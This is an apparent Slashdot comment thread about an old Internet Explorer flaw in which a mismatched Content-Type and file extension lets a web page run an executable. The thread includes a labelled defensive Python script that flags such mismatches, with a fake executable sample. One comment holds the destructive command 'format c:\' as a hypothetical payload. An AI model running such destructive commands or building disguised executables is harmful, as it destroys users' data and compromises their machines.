Another Gaping Microsoft Security Hole Goes Unpatched
For readers who care, this vulnerability results from Microsoft's integration of IE and the operating system. Files received via HTTP are supposed to be handled by examining the Content-Type header sent by the webserver - for instance, the Content-Type sent with this webpage is "text/html", identifying it as a text (non-binary) document which is marked up with HTML.
Netscape and most other browsers have no problem with this.
You will notice, however, that this method is rather different than how a Microsoft operating system determines how to handle a local file - by its three-letter extension. A file named "foo.txt" is handled as a text file, even if it is a binary image file that has been renamed for some reason.
Now, what happens when you integrate your web browser and your local browsing, say to render moot an anti-trust suit filed against your company? Will local files get a Content-Type? Will remote files be handled by examining their file extension?
IE handles files in an odd mish-mash of looking at the Content-Type sometimes for some purposes, looking at file extension sometimes for some purposes. It's hardly surprising that the bug-hunter in the above story has found a way to feed it a Content-Type at odds with the file extension - the Content-Type may be innocuous, but the extension says "execute me", so when the "integrated" IE engine gets ahold of it, the malicious content is automatically executed.
Now Microsoft has a problem. Because they chose to ignore the standard for handling downloaded files, Microsoft has painted themselves into a corner. If Microsoft suddenly changes how their browser handles downloaded files, tens of thousands (perhaps hundreds of thousands? any webpage which downloads files) of webpages "designed for IE" will have to be rewritten. No doubt this is the issue their programmers are wrestling with right now. It's a fundamental design issue - Microsoft designed their web browser with the goal of doing what was best for Microsoft (evading anti-trust charges) rather than doing what was best for their users. In fact a proper "fix" of this hole probably involves de-integrating their browser and local file handling to some extent.
If you routinely browse with Internet Explorer or read mail with Outlook, keep in mind that any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything. This has been true for at least two and a half years. And keep in mind that you can't fix the problem, you must rely on Microsoft to do it, if they so choose. And keep in mind that Microsoft is in no hurry to do anything about it, because it doesn't even consider it a vulnerability. Happy browsing!
I know this sounds like a stupid average comment but...who's using IE anyway? After I found Opera for Windows, I have no desire for another browser at all. Opera has some very useful UI details that make IE look as comfortable as reading web pages with wget | more.
You either get a warning that something is about to execute on your machine or you are prompted to download the file you just clicked on.
Sounds like a gaping hole to me.
Jeez, how about some perspective here?
I find it disturbing that the ones who made the exploit public are only revealing the details under NDA. It's not like this is a secret to those who would use it for malicious purposes. Sigh...
this seems to be a recurring theme... microsoft releases software, it has holes. maybe the problem isn't with the software, it's with the script kiddies wreaking havoc by exploiting them.
We'll see plenty of coverage within the next 48 hours, Microsoft statements by the end of tomorrow, and a bugfix by month's end. The big question is going to be, how will people cope in the midst of it all? Will this kind of lag time give virus creators the chance to do a whole world of damage? Considering how things have spread recently, I wouldn't be surprised at all if they did. Might be time to start browsing with my iBook more often.
What kind of steps can people use to protect themselves now, is there any kind of toggle or security setting that can be turned on in IExploiter 5.0(tm) to keep us a little bit safer?
My own pointless vanity vintage computing page
I have a very basic understanding of the law, and I am wondering if MS could be sued for negligence.
-- "I'm open to falling from grace"
Hmmm. Wonder where Bill's .plan file is?
lets not get carried away here.
If I disable downloads, how do I download the patch?
Oh yeah, install linux!
mk
"Memes do not exist! Tell everyone you know."
Considering that a lot of users never update their browser at all (I have seen quite a few people using the IE 4.0 that came with Win98), even an immediate release of a bugfix will still not undo the danger of having had that security hole in the first place.
If this bug in IE has really been around for two and a half years, how is it that no one has stumbled on to it until now? Could it be that (GASP!) security through obscurity actually worked in this case?
But I have been using a Win2k box at work, with IE 6.0 on it, for several hours a day now. In fact, we needed to temporarily install 3D Studio for one of my co-workers, so I visited astalavista and many "related sites" on that box - once for the software, twice for the dongle crack. And I can say for certain that my box hasn't been cracked.
So, as much as we want to believe that security through obscurity doesn't work, the vast majority of users have been safer because this sploit didn't show up on BUGTRAQ. Sure, Microsoft should have gotten off their collective tush and done something about it, and they should be held responsible now. But the mere notion that we are all in danger just because these bugs are kept secret is patently ridiculous.
~wally
Does anyone else notice that this story has been posted before, many times, with only slight variations each time?
What's in a Sig?
What kind of steps can people use to protect themselves now?
If you really want to toggle IE into secure mode you just need to click the little "X" in the top right corner of the window.
Slashdot? Oh, I just read it for the articles.
But entirely true and well deserved. I think they will be forced to patch this real soon now though, since now that the word is out many users' webmail will start filling up with all sorts of wonderful attachments to exploit this.
format c:\
someone decides to put up a website to demonstrate this vulnerability. the site deletes everything on your harddrive. someone else decides to embed this into an HTML email. this email is sent to lots of people and deletes their harddrives.
will MS be held responsible? will the person who put up a website as a 'proof-of-concept' be held responsible? what about the guy who sends around the email?
ultimately folks, I think the end user is going to be held responsible. i don't know about the rest of you, but the company I work for will hold me responsible if our systems fail. and blaming MS isn't going to help me one bit.
now that this cat is out of the bag...what can we do to protect ourselves if we can't switch from Windows b/c our jobs won't let us?
I prefer to call it security through unavailability. The unavailability of IE that is.
Go Galeon!
Security and a fast browser: Great stuff
Built on top of a free OS: Priceless.
No, really it is priceless...
From the slashdot article it doesn't seem like it would affect IE on other platforms (such as Mac OS). Although that probably affects only 4% of web traffic, it's important to note.
If you routinely browse with Internet Explorer or read mail with Outlook, keep in mind that any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything.
This is just not true. You specifically have to download things before they can do anything using IE and if you are dumb enough to use outlook and let it have the ability to execute file attachments automatically, you deserve what you get.
Michael says: "completely open any time you browse the web with IE."
Story says "who view a specially constructed Web page"
Okay, the hole isn't good - and MS must fix it - but the article as posted by
Your computer is open if you stumble across a specially constructed site. If you browse
Mmmmmmm
"The patch for Internet Explorer (IE) is currently in testing and could be released soon"
Second damned sentence. No wonder I don't come here anymore.
Another security hole in IE? I'm all patched out.. :(
Content-Type is an HTTP header. To receive it, the info must be transmitted via HTTP. You may have noticed that Netscape (and even Lynx, and yes even on Linux) have no problem displaying local html/ pdf/ whatever files without receiving an HTTP transmission, and thus no Content-Type header.
Yep, they do the same thing and look at the file extension to determine how to render files.
I'm not saying there's not a bug, or that it's not severe, but examining the file extension to determine type is hardly an IE-only thing.
Trolls throughout history:
Jonathan Swift
This is why I started using Mozilla.
Microsoft can't be to blame for this... Would you blame Linus for someone running a Kernel from 4 years ago, that might have a security hole in it?
And time exactly how long it takes for someone to make a virus out of this li'l puppy.
The best(?) part being that, after years of telling users that to get a virus via Outlook they had to click the attachment, it seems to be possible to write an executable-disguised-as-HTML message that will automatically execute, since there's no option to turn off HTML viewing in Outlook.
You ask if there is any toggle in IE? Did you read the article because it explained in there that there is indeed a toggle you can flip. Basically you have to turn off file downloads to protect yourself.
Most end up knowing that they will clean up the mess, because "The top guys like Microsoft so much - it has so many features." Nobody is willing to do an honest cost accounting for the top guys.
Until the collective IT folk give an honest accounting of how much MS is really costing them, there will not be a switch away from MS. The moment they do - stampede!
telnet server.foo.com 80
Connected to server.foo.com.
Escape character is '^]'.
GET /file-to-have-your-advice HTTP/1.0
For example, there are seven or eight different start-up objects in Windows 9x:
- msdos.sys [hidden file]
- config.sys
- autoexec.bat
- registry [many different keys]
- system.ini
- %windir%\system\vmm\*.* [just sucked up whole]
- startup folders [yes, you can have startup folders nested.
What a program is to do with a file is done in three different ways as well. It's little wonder that the thing is open to attack. You can't hunt it down unless you pretty much hack it, and follow their goofy retro thing with the 64-bit sequence: {01.22.23....}
Lack of forethought, I imagine.
OS/2 - because choice is a terrible thing to waste.
Well, you can just do what I do: Browse with Mozilla.
If you try to open an .exe that is named as a text file, the file associations within Windows will launch Notepad (or the associated program) and NOT fire off the renamed application. Ditto with .html and .wav files (or any other associated file). Are they sure they aren't talking about a file named something.txt.exe?
Thanks to file sharing, I purchase more CDs
Thanks to the RIAA, I buy them used...
I watched a good bit of this thread on bugtraq (check the archives). Several people on the list attempted to reproduce the exploit as detailed by the original poster and failed. Whether that was their mistake or not is anyone's guess. I didn't try it myself. It only seemed to affect certain builds. I'm certainly not saying IE users aren't vulnerable, I'm just saying get details before making too much noise. MS won't release a fix until they're good and ready, so let's just sit on the flames a bit and try to find out what is going on in reality.
It really isn't that hard to fix...
Honestly. No one here can really say anything new or relevant at this point. This story has been published hundreds of times, just with a different headline.
Now, what should really happen is the DoJ and BBB attack MS for malpractice: purposefully creating vulnerable systems and products which thereby require upgrades and costly procedures.
These people creating all these hacks and such for IE is a good thing because it makes IE better (hey, look how many people use that browser), but what really needs to happen is create a working browser with real software issues...not stupid security holes that can be easily avoided (and should have been).
They should be creating something that Joe Shmoe can easily program for in XML to change the way it looks. They should be creating something where I can go to a web-site without having to worry about catching a random virus. Perhaps this will add actual value to their product...rather than the forced value (since it HAS to be installed on all Windows machines).
"Time is long and life is short, so begin to live while you still can." -EV
This sounds to me just like the GM/Ford cases in the 60's about neglecting consumers. Isn't it time for the DOJ to put a period on all these things?
First that stupidity of Nimda IIS bug, that can't be fixed until next IIS release. And now this Security through obscurity crap?
Now I want to ask. "Where will M$ take us". I know where I want to go, but what about them?
-=-=-=-=
I know life isn't fair, but why can't it ever be un-fair in MY favor!?
Microsoft does its best (or worst) to provide something. But, heck, it's FREE. IE costs us nothing.
What I DO pay for is my virus scan. I'd like to know that if something gets through and hurts my security, the virus scanning software would catch it.
I wish people would stop getting mad at people for providing otherwise OK software with bugs in it, when those programs are FREE, and wish people would start getting mad at the virus scan companies (who my company pays lots of money to) for not catching threats.
The Internet is generally stupid
There use to be no such thing as an e-mail virus either until Microsoft came along and decided to give us one.
Let's all put our hands together and thank Microsoft.
1) Go to www.mandrake.com 2)download the Mandrake 8.1 ISOs. 3) Burn them to a CD 4) Insert CD #1 5) Reboot 6) Follow on-screen instructions Voila!! No more security problems with IE. And I almost forgot...no more BSOD!!!
seems like microsoft engineers like to point out in several dlls that netscape engineers are weenis, as was just reported yet again on bugtraq. i guess the question is simple... what is worse: being a weenie or a loser who does not know how to code securely/properly...
According to the article, the issue only comes up if you are prompted to save/download a file, and choose to open it from its current location. The file may appear to be a .txt or whatever, but if you open it from its current location you can't know for sure whether it's an executable.
The suggested solution is to never open from the current location. Choose save instead, which will reveal the real file type.
Damn right I would, if he didn't tell anyone about it, didn't release the code for public review, and didn't update the kernel so people could download new versions with a relatively simple installation process.
But, gee, since it's Linux, I don't think those things are real concerns, do you?
Hope to shed a little light down under your bridge.
This is a terrible vulnerability and I've seen it in action.
In IE, some audio formats are set to execute automatically.. so if you send a Content-Type of, say, audio/wav (which is executed automatically).. but the filename is myvirus.exe, windows will rely on associations based on file extensions in the registry to execute the file, as opposed to, say, trying to feed the file through a player.
So it will automatically launch the .exe WITHOUT warning and WITHOUT asking.
This is how some recent worms were spread around.
Boy am I glad I use mozilla for web and email.
The article was talking about current/recent versions of IE.
I heard a stable release version of LINUX deleted your hard drives.
I've evaluated software packages for my company for 7 years, and I have found absolutely nothing distasteful/upsetting about anything that has come through our pipe through IE. Sure you have a few porn URLs finding their way into the logs once in a while (usually the newer employees testing the limits of our IT usage policy) but nothing that can be considered malicious.
We take the usual precautions with our servers (standard antivirus, NT service packs) and as far as I'm concerned, that should be enough for anybody. I for one am tired of worried employees clogging up my (Outlook) in-box asking me if their work is at risk because of these "security holes". I try not to be smug when I reply that most of these claims are fraudulent and only meant to discredit a legitimate company with scare-tactics, flowery (and overcomplicated) techie-garble and lies.
Please, for the sake of making my job easier, stop posting imaginary stories about imaginary Microsoft security holes.
That's funny, my copy was $100, and that was with the upgrade discount.
Well, if you use Outlook, and you're dumb enough to run with preview pane on, you deserve what you get. Simply run without the preview pane on, and delete messages from unknown people before reading them. Very simple.
There is a distinct difference here. If you only count "running" IE, then that would mean whenever your Windows machine is up and running with how M$ has integrated IE into the kernel.
However, if it only matters when IE is surfing the web, then we have a little bit of security by ignoring IE.. Just wondering about this point of clarity...
I'm not terribly shocked--using a 3-letter extension to store that much metadata is absurd.
Luckily, the MacOS doesn't do tha.... oh, wait.... they do now...
Potato chips are a by-yourself food.
That'll definitely work, but the problem is going to be users at large networked sites. For example, the school I work at part-time as a tech. I -wish- the option were there to kill Windows in the labs, toss in some Apple hardware or Linux boxes. But for about a billion reasons, that's just not going to happen in my lifetime. Considering that we can't even afford to drop in a $700 build-it-yourself PC in some of the faculty offices while they're using '486-66's and P100's...
Ohyeah, and some are so damn dense they keep putting A4 paper in the printers. Support these people under Linux? No friggin' way.
Bad analogy dude. The problem is *current* browsers have the problem as well. You perhaps *could* blame linus for the current one having a hole.... or RATHER you could if he knew about it and didn't do anything, as in this case Microsoft is. Boys and girls, if anything goes wrong it's lawsuit world here, because as far as I can see , keeping it a secret someone is about to get his shit fucked up is being NEGLIGENT.
Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
Microsoft is to blame because they made it "easy" to use Windows!
Computers are complicated machines and should be treated as such.
Opera 6.0 is now available for download. If you tried an older version of this browser and thought it sucked, try it again. It's light, fast, more standards compliant, and its rendering engine is very compatible with the way I.E. and Netscape work so it works practically everywhere. You can browse MDI-style, which means you can have all of your browser windows as sub-windows of the main one, OR you can go NS/IE style and have a separate window for everything. It's skinnable (but you don't have to use a skin), it has more privacy and security features than I can count. You can turn off javascript pop-ups (or merely relegate them to popping up in the background). You can spoof the browser string as being I.E. or Netscape for those sites that are browser bigots. I cannot say enough good things about this software. And it's available for BeOS, Linux, Solaris, Mac, OS/2, QNX, Symbian OS and of course Windows. Get it here.
Error: PANTS NOT FOUND. Press <F1> to continue.
Could be that the ones that DID know about it didn't say anything. How would you have known? Security through obscurity may "work" but there's no audit checks to determine if it does or not unless someone aggressively uses a security flaw.
I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
A victim is defined in Websters as someone subjected to circumstances beyond their control.
MS must believe this is a victimless crime, since everyone using IE has the choice to not use it, right? And since usage gives tacit approval of rights as defined by MS, any user subjected to a break in of their system is on their own.
MS has made a mockery of responsibility, by leaving it up to consumers to take action or fall prey. I can only imagine the corner reserved in hell for a large part of the Redmond populace.
Let's not get into the definition of gaping hole, I'm sure some juvenile is prepping an ASCII rendition as we speak.
Imagine a backyard fence and the neighbors ill-tempered dog:
a.) built with a large hole so the dog can come thru uninvited
b.) built and later damaged by your neighbor...dog comes thru
c.) built and damaged by you, so the dog can come thru (again, uninvited)
Under scenario a, the assumption is you contracted for a fence sans holes, and this was a builder mistake...seems the builder is responsible for closing the hole and paying for shots needed when you get bitten by the dog.
Scenario b...go after the neighbor...simple.
Scenario c...SOL.
MS is responsible under scenario 'a', but points to scenario 'b' as a main issue, and figures consumers are stupid enough to accept scenario 'c', if b doesn't fly. They avoid scenario 'a' all together.
Why they get away with this type of subject-switching (look, over there! Thats the problem!!!) prehensile logic is clear...consumers are stupid.
Wake up, folks! As long as you continue to buy MS products in the head down position, MS will continue to shirk responsibility for shoddy goods.
You base all of the internet traffic on the web on 9688 hosts (not accesses or people) accessing one WWW server at a university? Geez, go take a statistics class.
-Shmibbon
Now I know Slashdot is getting ready for its annual MS beatdown stick, but read the article. It says MSFT is testing and ready to release a fix to the problem.
The bug hasn't been exploited. It hasn't caused huge problems. MSFT is coming out with a fix BEFORE hackers could find a way to exploit it. THEY took care of the problem fast enough to stop it from being a problem.
the byproduct of years of oppression by the white man
No, I didn't. But at least I'll admit that. :) However, I did assume that the obvious response would be something along those lines, which just doesn't work in the environment I need to have a fix for someday, which is a large number of client workstations. If we turned off downloading of files, I think we'd get lynched by the faculty. :)
Second, don't just bitch about IE. If you haven't already, check out the alternatives:
-
Mozilla, now in Version 0.9.6, is very feature-rich and fast and the most standard-compliant browser in existence, but not for computers with less than 128 MB of memory.
- kmeleon (Windows) and galeon (Linux) are Mozilla derivatives with smaller footprint.
- Opera, which is closed source adware and requires registration, is a very fast browser that is especially recommended for "information surfers" because of its excellent navigation and caching.
- Konqueror is KDE's built-in browser. Thanks to Qt/Embedded and/or KDE-Cygwin, it might be ported to Windows as well.
- Lynx and W3M are up-to-date text mode browsers capable of displaying most pages which do not depend on images or animations.
There is a choice, you just have to make it. And no, I didn't copy & paste this from elsewhere and I actually tested all of these, so you may mod me up without guilt. My personal recommendation: Opera (and Mozilla once I've upgraded to 512 megs and V1.0 is out).

"Microsoft will patch a flaw in its Web browser that could allow an attacker to silently download and execute malicious programs on the computers of users who view a specially constructed Web page or e-mail message." (emphasis added)
From the article's intro:
"Microsoft has known about it since November 19; they refuse to provide any information about when a patch might be made available, if ever."
Also: "And keep in mind that Microsoft is in no hurry to do anything about it . . ."
Full marks for a more thorough description of the exploit and how it came about -- but did the poster actually read the article before posting? Looks to me like he hit the original report but not the article, which says that MS did initially plan to let it go, but did an about-face after a while.
Nasty flaw nonetheless -- glad I switched to Mozilla.
The problem here is that some journalist got wind of a patch too soon and decided to write a story about it. I think that the media needs to think about what they write in terms of software security.
I mean even since Sept. 11 all media outlets are rethinking what is and what isn't safe to release to the public in the name of national security.
What they are overlooking is that security holes in software are also a breach of national security and they need to step back and decide if what they are releasing is appropriate. The argument could be made for this particular article either way.
You might want to check Post Anonymously next time. You do realize Autodesk is one of the most rabidly anti-piracy companies on the planet?
The upstream comment is 100% pure bullshit.
When you're using Netscape or Lynx and the URL starts with "http:", it's speaking HTTP. It can use that protocol to send whatever type of data the server wants to send - text/html, application/x-pdf, whatever. You seem to be confusing HTTP and HTML - the communications protocol and what's being communicated.
Meanwhile, the canonical way to identify the type of a file on a Unix system is to look at for "magic numbers," and then hopefully verify them by parsing what you think is the header and making sure checksums are valid, values are sane, etc. Any Unix application developer that looks at the extension *alone* should usually be fired on the spot. (The sole exception is completely unstructured text where you have to use it as a hint, e.g., ".c" means C, ".cc" means C++.)
This isn't just a bad attitude, it reflects the fact that Unix tools have to deal with pipes and often don't have any filename (much less extension) associated with the data stream. If you require a file extension to understand what you have, you've crippled your application.
For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
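The check this thread keeps circling, written out as an added example (it is not code from the original post, from Microsoft, or from any of the commenters): the opening post describes IE trusting the Content-Type for some decisions and the file extension for others, the "audio/wav but filename myvirus.exe" comment above shows where that leads, and the Unix comment directly above says the reliable answer is magic numbers. The Python below parses a raw HTTP response and reports every disagreement among the header, the filename, and the leading bytes, which is the logic a download proxy or mail gateway would apply. The small magic and extension tables and the sample responses are constructed for the example; a real deployment would use libmagic.

```python
"""Compare what an HTTP response claims a download is against what it is.

Three signals are checked against each other:
  1. the Content-Type header   (what the server says it is),
  2. the filename extension    (what the user sees / what Windows executes),
  3. the leading "magic" bytes (what the file actually is).
Any disagreement, and any executable hiding behind a harmless type, is reported.
"""
import re
from typing import Dict, List, Optional, Tuple

# Minimal magic-number table (assumption: real deployments use libmagic).
MAGIC: Tuple[Tuple[bytes, str], ...] = (
    (b"MZ", "application/x-msdownload"),          # DOS/Windows PE executable
    (b"RIFF", "audio/wav"),                       # RIFF container; WAVE confirmed below
    (b"%PDF-", "application/pdf"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"PK\x03\x04", "application/zip"),
)

# Minimal extension table (assumption, same caveat as above).
EXT_TO_MIME: Dict[str, str] = {
    ".exe": "application/x-msdownload", ".com": "application/x-msdownload",
    ".scr": "application/x-msdownload", ".wav": "audio/wav",
    ".txt": "text/plain", ".html": "text/html", ".pdf": "application/pdf",
    ".png": "image/png", ".zip": "application/zip",
}
EXECUTABLE_TYPES = {"application/x-msdownload"}


def sniff(body: bytes) -> Optional[str]:
    """Return the MIME type implied by the body's leading bytes, or None."""
    for prefix, mime in MAGIC:
        if body.startswith(prefix):
            if prefix == b"RIFF" and body[8:12] != b"WAVE":
                return "application/octet-stream"   # AVI, WebP, ... but not WAV
            return mime
    if body and b"\x00" not in body[:1024]:           # no NUL bytes: treat as text
        return "text/plain"
    return None


def parse_response(raw: bytes) -> Tuple[Dict[str, str], bytes]:
    """Split a raw HTTP/1.x response into lowercase-keyed headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split(b"\r\n")[1:]:              # [0] is the status line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return headers, body


def declared_filename(headers: Dict[str, str], url_path: str) -> str:
    """Filename from Content-Disposition, falling back to the URL's last segment."""
    m = re.search(r'filename="?([^";]+)"?', headers.get("content-disposition", ""), re.I)
    return m.group(1) if m else url_path.rsplit("/", 1)[-1]


def extension(name: str) -> str:
    """Last suffix, lowercased. Windows drops trailing dots and spaces, so
    'readme.txt   .exe' is still an .exe; only the final suffix counts."""
    name = name.rstrip(" .")
    idx = name.rfind(".")
    return name[idx:].lower() if idx != -1 else ""


def classify(raw: bytes, url_path: str) -> dict:
    """Cross-check header, extension and magic bytes; list every disagreement."""
    headers, body = parse_response(raw)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    fname = declared_filename(headers, url_path)
    ext_mime = EXT_TO_MIME.get(extension(fname))
    real = sniff(body)
    findings: List[str] = []
    if real in EXECUTABLE_TYPES and ctype not in EXECUTABLE_TYPES:
        findings.append(f"body is an executable but Content-Type says {ctype or '(none)'}")
    if ext_mime and real and ext_mime != real:
        findings.append(f"name {fname!r} implies {ext_mime} but body is {real}")
    if ext_mime and ctype and ext_mime != ctype:
        findings.append(f"name {fname!r} implies {ext_mime} but Content-Type says {ctype}")
    return {"filename": fname, "content_type": ctype, "sniffed": real,
            "findings": findings, "suspicious": bool(findings)}


# Constructed sample responses (not real captures).
# 1. The case in the thread: harmless Content-Type, executable name, PE body.
EVIL = (b"HTTP/1.0 200 OK\r\nContent-Type: audio/wav\r\n"
        b'Content-Disposition: attachment; filename="myvirus.exe"\r\n\r\n'
        b"MZ\x90\x00" + b"\x00" * 61)
# 2. The other disguise: PE body served as text under a .txt name.
FAKE_TXT = (b"HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n"
            b"MZ\x90\x00" + b"\x00" * 61)
# 3. Honest downloads.
REAL_WAV = (b"HTTP/1.0 200 OK\r\nContent-Type: audio/wav\r\n\r\n"
            b"RIFF\x24\x00\x00\x00WAVEfmt ")
REAL_TXT = b"HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\nhello, world\n"

if __name__ == "__main__":
    for label, raw, path in (("EVIL", EVIL, "/dl/song.wav"), ("FAKE_TXT", FAKE_TXT, "/readme.txt"),
                             ("REAL_WAV", REAL_WAV, "/song.wav"), ("REAL_TXT", REAL_TXT, "/readme.txt")):
        verdict = classify(raw, path)
        print(label, "SUSPICIOUS" if verdict["suspicious"] else "ok", verdict["findings"])
```

The first two samples are flagged with two findings each, the honest ones with none. Note that the extension check uses only the final suffix after stripping trailing dots and spaces, which is what Windows does; a display truncated at a long run of spaces is exactly how "readme.txt" and "readme.txt   .exe" get confused.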
That reminds me of my warez days on irc. When people used to offer up site lists via dcc bots, other people would merely have to type a certain command to begin a dcc send from the bot to them (something like: !list). One day, one of the OPs set his away message to: "0-day, 2000 site ftp list. All verified and working! Hit Alt+F4 to receive the list!" Next thing you know, the channel of about 120 people turned into about 70 people. We almost got flooded off from the server messages 'NickX has quit' 'NickY has quit' 'Nickxxx has quit' et al. It was great.
You're talking local versus server context. In the case of a local file, MS and Windows "KNOW" that it's not an executable because of the extension. However, if the server tells the browser it's something completely different, it'll do its level best to try to carry out the cueing from the server, i.e. if it swears it's an application of a type MS understands, it'll try to run it, even if the extension is ".txt". At least that is my understanding of the flaw in the browser.
The concern, from what I understand, is that a user might be led to believe that "readme.txt" will be opened and viewed as a text file by IE. This, when in fact the website has placed executable binary/script data in the file and changed the appropriate response headers so that IE is fooled into executing it as a program if it is 'opened'.
All the user sees as a prompt is "Open" or "Save Target As" using the menu options OR again "Open, Save, Cancel" by clicking on the link.
For an inexperienced user, the appropriate option will probably not be obvious. This is because many users have a lot of trouble navigating the file system to find files that have been saved by applications and enjoy the shortcut of having Windows decide how the file should be 'opened'.
I agree that an experienced user would never choose open because they know this is very risky. But, in my mother's case, she has trouble deciding when to click and doubleclick.
In Microsoft's defence, however, the "Open" option is never the default. Thus, it's probably safe to say that an ignorant user will almost always be safe from this attack as they will be picking the default and saving the file to the disk. At that point, "readme.txt" cannot be executed and is only openable from a text editor.
Anyways.. no matter how you look at it, this is a problem that fundamentally involves the act of downloading a file. Something even my mother knows not to do by herself. This is not a security issue of the same magnitude as the worm viruses that plagued IIS.
Do not spread "09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0" over the internet, thank you.
Thanks, Timothy, for your unwarranted alarmism. Saying that "any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything," with the implication there's nothing you can do about it is ridiculous.
An accurate summary of the article:
Any web page you visit or any email you open can cause a dialog box to pop up, prompting you to save or open a file. The filename may be wrong on this dialog. If you choose open, you receive no further warnings before potentially malicious code is run. If you choose save, it prompts you where to save it, and saves it there. (At that point it's relatively safe - if the filetype is still wrong, you can't execute it; if it's not wrong, you can see it's an exe).
A patch wouldn't help much - the people who are up on things enough to install it are the same people who will know to take the SIMPLE PRECAUTION of not opening unknown files directly off the web.
It is a shame that due to a bug in their browser MSIE doesn't run sirens and blinking lights and threaten the possible destruction of your computer every time you try to run any code that you didn't write yourself, but it doesn't exactly open your box up to the world or anything.
In conclusion, let me say screw you and your shitty biased reporting, slashdot.
Trees can't go dancing
So do them a big favor
Pretend dancing stinks!
Read what Micheal is saying again.
- Copy your current explorer.exe, shell32.dll, comdlg32.dll, notepad.exe and wordpad.exe to a backup location in case things go haywire. (I've done this before on Windows 98 and ME boxes without problems, but it's always good to be safe).
- Insert the Windows 95 CD, and start a dos prompt.
- From the prompt, enter:

  d: (or whatever your CD drive is)
  cd win95
  extract /a /l c:\your\windows\desktop win95_02.cab comdlg32.dll explorer.exe shell32.dll notepad.exe wordpad.exe

- You should have the files listed above appear on your desktop. Now shut down into DOS mode, and copy the new shell32.dll and comdlg32.dll into your Windows SYSTEM directory, and copy explorer.exe, notepad.exe and wordpad.exe into your WINDOWS directory, and reboot Windows. (If you're using ME, you can go into c:\windows\system.ini and change your shell to taskman.exe in order to be able to replace explorer and the other system files)
Your system should come up with the old Windows 95 shell, which doesn't have any of the IE integration bullshit. IE will still launch as a separate application (with an Office-style splash screen, even!) and since the IE dll's aren't stuck in your memory all the time, your system should be a bit faster too.
Of course, after doing this, the next step is to replace your browser, but that goes without saying. :-)
Loneliness is a power that we possess to give or take away forever
I notice many people complain about MS using the web browser and file browser as the same thing. But it seems everyone else is doing that too. KDE's Konqueror is a combined web/file browser. Nautilus also does this. If this is such a bad idea why is everyone doing this. The only desktop that I know of that doesn't try to do this is the Mac OS.
Sure, MS can be sued for negligence, just like they can be sued for antitrust violations. You may even win, if you can prove that you suffered actual harm from this. And then the judge will ask Microsoft what they think they should have to do to compensate you, and Microsoft will say that they should give you a sticker that you can stick on your monitor that says "Don't open files from their current location. Always save to disk!". So in the end, Microsoft will stick it to you.
The details were revealed by StatiC on bugtraq. He seemed to discover a way to do it a few months ago, but didn't "put 2 and 2 together" about using a .exe extension until the generic advisory without details was published about 2 weeks on bugtraq.
Details and exploit:
http://www.securityfocus.com/archive/1/243017
I didn't say it was a great solution I just said it was a solution.
An even better solution is to use paper and pencil.
Nautilus on my Debian GNU/Linux system depends on magic to determine file type and it is very reliable.
IE does however depend on the file extension to determine whether the file is executable or not. Anyone can send you a file with a .exe .com or .bat extension and it automatically becomes executable when you save it. On Linux and other UNIX systems, a file is executable when that permission is given, executability is not determined by its extension. So you would have to do a chmod +x file after downloading a file to be able to run it.
ayottesoftware.com
This is a shameless pandering to the preconceptions of the Slashdot crowd. The statement that "Nobody is willing to do an honest cost accounting for the top guys" is simply not true, and it's an unfair dismissal of IE's very real successes in that space.
IT guys can and do choose other browsers. Last I heard, Navigator still had over 1/3 of the corporate browser market. Suggesting that IT folk would be cowed by the "top guys" flies in the face of every experience I've had with them: that they're pragmatic, honest, and outspoken.
How many fucking years have they had to do this? How many fucking years longer are we going to rely on GIF (fucking cringe) for transparency because 85% of web browsers are using IE?
How many other browsers have implemented alpha transparency in PNG's in absolutely no time at all? Mozilla, Konqueror, Opera... are there any more? Why the FUCK can't IE, which is supposedly the best browser there is, handle it?
Pardon my absolutely mindless lunatic ranting... just really pissed that PNG's still aren't an option... thanks to IE.
Sticking feathers up your butt does not make you a chicken - Tyler Durden
There must have been a huge party at FBI headquarters on Nov 19 (when this was reported to MSFT) since they finally had a viable delivery system for Magic Lantern.
Microsoft designed their web browser with the goal of doing what was best for Microsoft (evading anti-trust charges) rather than doing what was best for their users. In fact a proper "fix" of this hole probably involves de-integrating their browser and local file handling to some extent.
Hey Malda and VA Software executives, or whoever is in charge of keeping a minimal amount of decency on this site: why do you keep letting crap like this make the front page? This is not informative, insightful, or in any way useful. This is just a rant by a pissed-off bigot, pure and simple.
The vulnerability is real, but it is presented in such a hate-filled manner that it's unbearable to read. Michael has done nothing but spew venom in this posting. He's doing the right thing by bringing this to the attention of millions, but he does so with only malicious subtext to his main point.
This reads like a stream-of-consciousness scream from a 13-year-old who's just had his Nintendo taken away from him. This isn't journalism, it isn't even information, it's just garbage.
Please, do us all a favor: if Michael can't clean up his act and give us his material in at least a somewhat-presentable manner, fire him. You're losing respect for your site with postings like this. And no, this is not a troll, I'm serious.
With all of the email viruses, internet borne viruses, worms, holes, DDOS attacks, it surprises me that anyone even uses the internet or related technologies at all. It will be a sad day when the whole idea of the internet is just "dumped" because of hackers (the bad kind), holes and bandwidth abuse. It seems like daily that I read through the articles on slashdot and find a new hole, exploit or virus that is being used or abused. Take for instance the recent decision to shut down the first IRC server, because of repeated DDOS attacks, that is truly a shame. As I have said often before, abuse it and lose it...
Nathaniel P. Wilkerson
www.haidacarver.com
My god, that entire post was one big MS bash fest.
They make ZERO mention of the fact that dialog boxes DO still appear.
From reading that article one is lead to believe that the file is just "silently" downloaded without any noticeable signs....
I'm getting a little sick of the way certain "journalists" will downplay anything decent MS does, and blow the bad things WAY out of proportion.
It's ludicrous!
From this particular crowd I expected a LOT more than sensationalist garbage! If I wanted that I would bookmark CNN!
Sounds like this patch (assuming they actually fix it) that will be forced by the PR gods will fix an issue that I've struggled with. IE just ignores the bloody HTTP header when it comes to mime type.
